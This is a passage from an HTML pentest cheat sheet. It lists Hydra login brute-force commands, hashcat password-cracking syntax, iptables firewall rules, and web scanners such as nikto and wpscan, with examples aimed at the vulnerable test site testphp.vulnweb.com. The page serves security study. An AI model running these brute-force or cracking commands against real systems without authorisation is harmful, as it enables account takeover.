					<span class="exp">: modules like http-get, http-get-form etc. require params</span>
				</span>
				<br>│ <code>hydra -l admin -P passlist.txt http-head://testphp.vulnweb.com -m /basic.php</code>
				<br>│ <code>hydra -l admin -P passlist.txt http-get-form://testphp.vulnweb.com</code>
				<br>│ <span class="spacer">aaa</span><code class="etc">-m "/login.php:user=^USER^&password=^PASS^:Couldn't login"</code>
				<br>│ <code class="etc">OBS: to filter by successfull login message: S=Welcome</code>
				<br>│ <code>hydra -l admin -P passlist.txt http-post-form://testphp.vulnweb.com</code>
				<br>│ <span class="spacer">aaa</span><code class="etc">-m "/login.php:user=^USER^&password=^PASS^:Couldn't login"</code>
			</li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">hashcat</span> <span class="exp">: hashed password cracker</span>
				<br> │ <span class="ident">
					<span class="opt">-a <span class="param">int</span></span>
					<span class="exp">: type of attack, [0-straight, 1-combination, 3-brute force, </span>
					<br>│ <span class="exp"> <span class="spacer">aaaaaaaaa</span>6-hybrid wordlist + mask, 7-hybrid mask + wordlist]</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-m <span class="param">type</span></span>
					<span class="exp">: type of hash, see the hascat man to see all</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-o <span class="param">filename</span></span>
					<span class="exp">: specifies filename ti write output in</span>
				</span>
				<br> │ <code>hashcat -a 0 -m 1000 - o cracked.txt "HASHEDPASSHERE" wordlist.txt</code>
				<br> │ <code>hashcat -a 0 -m 1800 - o cracked.txt hashes.txt wordlist.txt</code>
			</li>

			<p>│</p>
      <p>│</p>
      <p>│ <span class="spacer">aaaaa</span>┌─────────┐</p>
      ├──────┤<h3>Defense</h3> │
      <p>│ <span class="spacer">aaaaa</span>└─────────┘</p>
      <p>│</p>

			
			<li>
				├ <span class="cmd">iptables</span> <span class="exp">: linux firewall</span>
				<br> │ <span class="ident">
					<span class="opt">-L</span>
					<span class="exp">: list rules of a table, default is filter</span>
				</span>
				<br> │ <code>iptables -L</code>
				<br> │ <code>iptables -L -t nat</code>
				<br> │ <span class="ident">
					<span class="opt">-t <span class="param">table_type</span></span>
					<span class="exp">: specifies table type [filter, nat or mangle]</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-d <span class="param">ipv4</span></span>
					<span class="exp">: dst host</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-s <span class="param">ipv4</span></span>
					<span class="exp">: src host</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-p <span class="param">protocol</span></span>
					<span class="exp">: protocol to apply rule [tcp, udp or icmp]</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-sport <span class="param">src_port</span></span>
					<span class="exp">: src port</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-dport <span class="param">dst_port</span></span>
					<span class="exp">: dst port</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-o <span class="param">src_interface</span></span>
					<span class="exp">: src interface</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-i <span class="param">dst_interface</span></span>
					<span class="exp">: dst interface</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-s <span class="param">ipv4</span></span>
					<span class="exp">: src host</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">!</span>
					<span class="exp">: negation to the following rule, as not in programming languages</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-j <span class="param">action</span></span>
					<span class="exp">: action to be executed when rule is true</span>
				</span>
				<br> │ <code class="etc">ACCEPT: accepts</code>
				<br> │ <code class="etc">DROP: blocks package, doesn't throw an error</code>
				<br> │ <code class="etc">REJECT: blocks package, throws an error</code>
				<br> │ <code class="etc">DNAT: redirects package to a specified ip via --to</code>
				<br> │ <code class="etc">REDIRECT: redirects package to a specified port via --to</code>
				<br> │ <code class="etc">MASQUERADE: masks ipv4</code>
				<br> │ <span class="ident">
					<span class="opt">-A <span class="param">rule</span></span>
					<span class="exp">: adds <span class="param">rule</span></span>
				</span>
				<br> │ <code>iptables -A OUTPUT -d 192.168.0.103 -j DROP</code>
				<br> │ <code>iptables -A INPUT -p icmp -s 192.168.0.100 -j REJECT</code>
				<br> │ <span class="ident">
					<span class="opt">-D <span class="param">rule</span></span>
					<span class="exp">: deletes <span class="param">rule</span></span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-F</span>
					<span class="exp">: deletes all rules</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-P <span class="param">option</span></span>
					<span class="exp">: modifies behavior of a chain of rules [ACCEPT or DROP]</span>
				</span>
			</li>

			<p>│</p>
      <p>│</p>
      <p>│ <span class="spacer">aaaaaa</span>┌──────────┐</p>
      ├───────┤<h3>Scanners</h3> │
      <p>│ <span class="spacer">aaaaaa</span>└──────────┘</p>
      <p>│</p>

			<li>
				├ <span class="cmd">nikto</span> <span class="exp">: nikto -host http://testphp.vulnweb.com</span>
				<br> │ <span class="ident">
					<span class="opt">-o <spn class="param">file</spn></span>
					<span class="exp">: writes output to <span class="param">file</span></span>
				</span>
			</li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">wpscan</span> <span class="exp">: wordpress vuln scan</span>
				<br> │ <span class="ident">
					<span class="opt">--url <spn class="param">url</spn></span>
					<span class="exp">: specifies url to scan</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">--enumerate <spn class="param">p/t/u/tt</spn></span>
					<span class="exp">: gets plugins/themes/users/timthumbs</span>
				</span>
			</li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">skipfish</span> <span class="exp">: skipfish -o path/to/output/folder/ http://testphp.vulnweb.com</span>
			</li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">wapiti</span> <span class="exp">: wapiti http://testphp.vulnweb.com -o path/to/output/folder/</span>
			</li>

    </ul>

    <p style="margin-top: 3rem;">Creator: <a href="ttps://github.com/gabriela-tomazzi">gabi schstr</a></p>
  </main>
</body>
</html>